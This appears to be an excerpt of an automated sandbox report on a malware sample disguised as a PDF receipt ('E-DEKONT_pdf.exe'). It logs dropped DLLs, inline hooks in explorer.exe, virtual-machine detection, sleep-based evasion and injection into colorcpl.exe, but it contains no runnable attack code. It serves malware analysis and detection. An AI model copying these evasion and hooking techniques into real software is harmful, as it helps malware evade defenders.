Code function: 0_2_6EC92288 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_6EC92288

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	File created: C:\Users\user\procharity\Anasarca\Uncompelled\Velocity\aedilic\Subanconeal\MapiProxy_InUse.dll			Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	File created: C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xE4

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_2-13798

Source: C:\Windows\explorer.exe TID: 9756	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 9756	Thread sleep time: -82000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 10040	Thread sleep count: 118 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 10040	Thread sleep time: -236000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

Dropped PE file which has not been started: C:\Users\user\procharity\Anasarca\Uncompelled\Velocity\aedilic\Subanconeal\MapiProxy_InUse.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 3_2_04381763 rdtsc

3_2_04381763

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 861			Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 887			Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe

API coverage: 2.0 %

Source: C:\Windows\SysWOW64\colorcpl.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	Code function: 0_2_004059F6 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,		0_2_004059F6
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	Code function: 0_2_004065AB FindFirstFileA,FindClose,		0_2_004065AB

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	API call chain: ExitProcess graph end node			graph_0-2286
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	API call chain: ExitProcess graph end node			graph_0-2472

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: E-DEKONT_pdf.exe, 00000000.00000002.3345849854.000000000A599000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: E-DEKONT_pdf.exe, 00000000.00000002.3345849854.000000000A599000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: E-DEKONT_pdf.exe, 00000000.00000002.3345849854.000000000A599000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: E-DEKONT_pdf.exe, 00000000.00000002.3345849854.000000000A599000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: E-DEKONT_pdf.exe, 00000000.00000002.3345849854.000000000A599000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: E-DEKONT_pdf.exe, 00000000.00000002.3345849854.000000000A599000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: E-DEKONT_pdf.exe, 00000000.00000002.3345849854.000000000A599000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: E-DEKONT_pdf.exe, 00000000.00000002.3345849854.000000000A599000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: E-DEKONT_pdf.exe, 00000000.00000002.3345849854.000000000A599000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: E-DEKONT_pdf.exe, 00000000.00000002.3345849854.000000000A599000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: E-DEKONT_pdf.exe, 00000000.00000002.3345849854.000000000A599000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

0_2_6EC92288

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 3_2_04381763 rdtsc

3_2_04381763

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043FD430 mov eax, dword ptr fs:[00000030h]	3_2_043FD430
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043FD430 mov eax, dword ptr fs:[00000030h]	3_2_043FD430
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04377425 mov eax, dword ptr fs:[00000030h]	3_2_04377425
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04377425 mov ecx, dword ptr fs:[00000030h]	3_2_04377425
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CF42F mov eax, dword ptr fs:[00000030h]	3_2_043CF42F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CF42F mov eax, dword ptr fs:[00000030h]	3_2_043CF42F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CF42F mov eax, dword ptr fs:[00000030h]	3_2_043CF42F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CF42F mov eax, dword ptr fs:[00000030h]	3_2_043CF42F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CF42F mov eax, dword ptr fs:[00000030h]	3_2_043CF42F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433B420 mov eax, dword ptr fs:[00000030h]	3_2_0433B420
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C9429 mov eax, dword ptr fs:[00000030h]	3_2_043C9429
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440A464 mov eax, dword ptr fs:[00000030h]	3_2_0440A464
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043FF409 mov eax, dword ptr fs:[00000030h]	3_2_043FF409
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D6400 mov eax, dword ptr fs:[00000030h]	3_2_043D6400
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D6400 mov eax, dword ptr fs:[00000030h]	3_2_043D6400
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433640D mov eax, dword ptr fs:[00000030h]	3_2_0433640D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04348470 mov eax, dword ptr fs:[00000030h]	3_2_04348470
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04348470 mov eax, dword ptr fs:[00000030h]	3_2_04348470
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043FF478 mov eax, dword ptr fs:[00000030h]	3_2_043FF478
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CE461 mov eax, dword ptr fs:[00000030h]	3_2_043CE461
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434D454 mov eax, dword ptr fs:[00000030h]	3_2_0434D454
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434D454 mov eax, dword ptr fs:[00000030h]	3_2_0434D454
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434D454 mov eax, dword ptr fs:[00000030h]	3_2_0434D454
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434D454 mov eax, dword ptr fs:[00000030h]	3_2_0434D454
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434D454 mov eax, dword ptr fs:[00000030h]	3_2_0434D454
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434D454 mov eax, dword ptr fs:[00000030h]	3_2_0434D454
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437D450 mov eax, dword ptr fs:[00000030h]	3_2_0437D450
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437D450 mov eax, dword ptr fs:[00000030h]	3_2_0437D450
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436E45E mov eax, dword ptr fs:[00000030h]	3_2_0436E45E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436E45E mov eax, dword ptr fs:[00000030h]	3_2_0436E45E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436E45E mov eax, dword ptr fs:[00000030h]	3_2_0436E45E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436E45E mov eax, dword ptr fs:[00000030h]	3_2_0436E45E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436E45E mov eax, dword ptr fs:[00000030h]	3_2_0436E45E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350445 mov eax, dword ptr fs:[00000030h]	3_2_04350445
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350445 mov eax, dword ptr fs:[00000030h]	3_2_04350445
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350445 mov eax, dword ptr fs:[00000030h]	3_2_04350445
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350445 mov eax, dword ptr fs:[00000030h]	3_2_04350445
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350445 mov eax, dword ptr fs:[00000030h]	3_2_04350445
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04350445 mov eax, dword ptr fs:[00000030h]	3_2_04350445
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C0443 mov eax, dword ptr fs:[00000030h]	3_2_043C0443
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D84BB mov eax, dword ptr fs:[00000030h]	3_2_043D84BB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437E4BC mov eax, dword ptr fs:[00000030h]	3_2_0437E4BC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043424A2 mov eax, dword ptr fs:[00000030h]	3_2_043424A2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043424A2 mov ecx, dword ptr fs:[00000030h]	3_2_043424A2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CD4A0 mov ecx, dword ptr fs:[00000030h]	3_2_043CD4A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CD4A0 mov eax, dword ptr fs:[00000030h]	3_2_043CD4A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CD4A0 mov eax, dword ptr fs:[00000030h]	3_2_043CD4A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043744A8 mov eax, dword ptr fs:[00000030h]	3_2_043744A8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437B490 mov eax, dword ptr fs:[00000030h]	3_2_0437B490
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437B490 mov eax, dword ptr fs:[00000030h]	3_2_0437B490
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CC490 mov eax, dword ptr fs:[00000030h]	3_2_043CC490
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04340485 mov ecx, dword ptr fs:[00000030h]	3_2_04340485
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437648A mov eax, dword ptr fs:[00000030h]	3_2_0437648A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437648A mov eax, dword ptr fs:[00000030h]	3_2_0437648A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437648A mov eax, dword ptr fs:[00000030h]	3_2_0437648A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043FF4FD mov eax, dword ptr fs:[00000030h]	3_2_043FF4FD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043464F0 mov eax, dword ptr fs:[00000030h]	3_2_043464F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437A4F0 mov eax, dword ptr fs:[00000030h]	3_2_0437A4F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437A4F0 mov eax, dword ptr fs:[00000030h]	3_2_0437A4F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043694FA mov eax, dword ptr fs:[00000030h]	3_2_043694FA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CE4F2 mov eax, dword ptr fs:[00000030h]	3_2_043CE4F2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CE4F2 mov eax, dword ptr fs:[00000030h]	3_2_043CE4F2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043754E0 mov eax, dword ptr fs:[00000030h]	3_2_043754E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437E4EF mov eax, dword ptr fs:[00000030h]	3_2_0437E4EF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437E4EF mov eax, dword ptr fs:[00000030h]	3_2_0437E4EF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436F4D0 mov eax, dword ptr fs:[00000030h]	3_2_0436F4D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436F4D0 mov eax, dword ptr fs:[00000030h]	3_2_0436F4D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436F4D0 mov eax, dword ptr fs:[00000030h]	3_2_0436F4D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436F4D0 mov eax, dword ptr fs:[00000030h]	3_2_0436F4D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436F4D0 mov eax, dword ptr fs:[00000030h]	3_2_0436F4D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436F4D0 mov eax, dword ptr fs:[00000030h]	3_2_0436F4D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436F4D0 mov eax, dword ptr fs:[00000030h]	3_2_0436F4D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436F4D0 mov eax, dword ptr fs:[00000030h]	3_2_0436F4D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436F4D0 mov eax, dword ptr fs:[00000030h]	3_2_0436F4D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043644D1 mov eax, dword ptr fs:[00000030h]	3_2_043644D1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043644D1 mov eax, dword ptr fs:[00000030h]	3_2_043644D1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043614C9 mov eax, dword ptr fs:[00000030h]	3_2_043614C9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043614C9 mov eax, dword ptr fs:[00000030h]	3_2_043614C9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043614C9 mov eax, dword ptr fs:[00000030h]	3_2_043614C9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043614C9 mov eax, dword ptr fs:[00000030h]	3_2_043614C9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043614C9 mov eax, dword ptr fs:[00000030h]	3_2_043614C9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04382539 mov eax, dword ptr fs:[00000030h]	3_2_04382539
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04343536 mov eax, dword ptr fs:[00000030h]	3_2_04343536
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04343536 mov eax, dword ptr fs:[00000030h]	3_2_04343536
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433753F mov eax, dword ptr fs:[00000030h]	3_2_0433753F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433753F mov eax, dword ptr fs:[00000030h]	3_2_0433753F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433753F mov eax, dword ptr fs:[00000030h]	3_2_0433753F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04371527 mov eax, dword ptr fs:[00000030h]	3_2_04371527
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440A553 mov eax, dword ptr fs:[00000030h]	3_2_0440A553
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437F523 mov eax, dword ptr fs:[00000030h]	3_2_0437F523
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0441B55F mov eax, dword ptr fs:[00000030h]	3_2_0441B55F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0441B55F mov eax, dword ptr fs:[00000030h]	3_2_0441B55F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0435252B mov eax, dword ptr fs:[00000030h]	3_2_0435252B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0435252B mov eax, dword ptr fs:[00000030h]	3_2_0435252B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0435252B mov eax, dword ptr fs:[00000030h]	3_2_0435252B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0435252B mov eax, dword ptr fs:[00000030h]	3_2_0435252B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0435252B mov eax, dword ptr fs:[00000030h]	3_2_0435252B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0435252B mov eax, dword ptr fs:[00000030h]	3_2_0435252B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0435252B mov eax, dword ptr fs:[00000030h]	3_2_0435252B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CC51D mov eax, dword ptr fs:[00000030h]	3_2_043CC51D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04361514 mov eax, dword ptr fs:[00000030h]	3_2_04361514
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04361514 mov eax, dword ptr fs:[00000030h]	3_2_04361514
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04361514 mov eax, dword ptr fs:[00000030h]	3_2_04361514
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04361514 mov eax, dword ptr fs:[00000030h]	3_2_04361514
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04361514 mov eax, dword ptr fs:[00000030h]	3_2_04361514
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04361514 mov eax, dword ptr fs:[00000030h]	3_2_04361514
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF51B mov eax, dword ptr fs:[00000030h]	3_2_043EF51B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF51B mov eax, dword ptr fs:[00000030h]	3_2_043EF51B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF51B mov eax, dword ptr fs:[00000030h]	3_2_043EF51B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF51B mov eax, dword ptr fs:[00000030h]	3_2_043EF51B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF51B mov eax, dword ptr fs:[00000030h]	3_2_043EF51B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF51B mov eax, dword ptr fs:[00000030h]	3_2_043EF51B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF51B mov ecx, dword ptr fs:[00000030h]	3_2_043EF51B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF51B mov ecx, dword ptr fs:[00000030h]	3_2_043EF51B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF51B mov eax, dword ptr fs:[00000030h]	3_2_043EF51B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF51B mov eax, dword ptr fs:[00000030h]	3_2_043EF51B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF51B mov eax, dword ptr fs:[00000030h]	3_2_043EF51B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF51B mov eax, dword ptr fs:[00000030h]	3_2_043EF51B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043EF51B mov eax, dword ptr fs:[00000030h]	3_2_043EF51B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436E507 mov eax, dword ptr fs:[00000030h]	3_2_0436E507
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436E507 mov eax, dword ptr fs:[00000030h]	3_2_0436E507
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436E507 mov eax, dword ptr fs:[00000030h]	3_2_0436E507
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436E507 mov eax, dword ptr fs:[00000030h]	3_2_0436E507
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436E507 mov eax, dword ptr fs:[00000030h]	3_2_0436E507
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436E507 mov eax, dword ptr fs:[00000030h]	3_2_0436E507
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436E507 mov eax, dword ptr fs:[00000030h]	3_2_0436E507
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436E507 mov eax, dword ptr fs:[00000030h]	3_2_0436E507
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433B502 mov eax, dword ptr fs:[00000030h]	3_2_0433B502
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04342500 mov eax, dword ptr fs:[00000030h]	3_2_04342500
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437C50D mov eax, dword ptr fs:[00000030h]	3_2_0437C50D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437C50D mov eax, dword ptr fs:[00000030h]	3_2_0437C50D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0435C560 mov eax, dword ptr fs:[00000030h]	3_2_0435C560
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C9567 mov eax, dword ptr fs:[00000030h]	3_2_043C9567
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D6550 mov eax, dword ptr fs:[00000030h]	3_2_043D6550
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0435E547 mov eax, dword ptr fs:[00000030h]	3_2_0435E547
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04376540 mov eax, dword ptr fs:[00000030h]	3_2_04376540
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04378540 mov eax, dword ptr fs:[00000030h]	3_2_04378540
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434254C mov eax, dword ptr fs:[00000030h]	3_2_0434254C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043445B0 mov eax, dword ptr fs:[00000030h]	3_2_043445B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043445B0 mov eax, dword ptr fs:[00000030h]	3_2_043445B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C85AA mov eax, dword ptr fs:[00000030h]	3_2_043C85AA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04372594 mov eax, dword ptr fs:[00000030h]	3_2_04372594
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CC592 mov eax, dword ptr fs:[00000030h]	3_2_043CC592
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043E7591 mov edi, dword ptr fs:[00000030h]	3_2_043E7591
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043BE588 mov eax, dword ptr fs:[00000030h]	3_2_043BE588
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043BE588 mov eax, dword ptr fs:[00000030h]	3_2_043BE588
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437A580 mov eax, dword ptr fs:[00000030h]	3_2_0437A580
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437A580 mov eax, dword ptr fs:[00000030h]	3_2_0437A580
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04379580 mov eax, dword ptr fs:[00000030h]	3_2_04379580
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04379580 mov eax, dword ptr fs:[00000030h]	3_2_04379580
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043FF582 mov eax, dword ptr fs:[00000030h]	3_2_043FF582
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CC5FC mov eax, dword ptr fs:[00000030h]	3_2_043CC5FC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437A5E7 mov ebx, dword ptr fs:[00000030h]	3_2_0437A5E7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437A5E7 mov eax, dword ptr fs:[00000030h]	3_2_0437A5E7
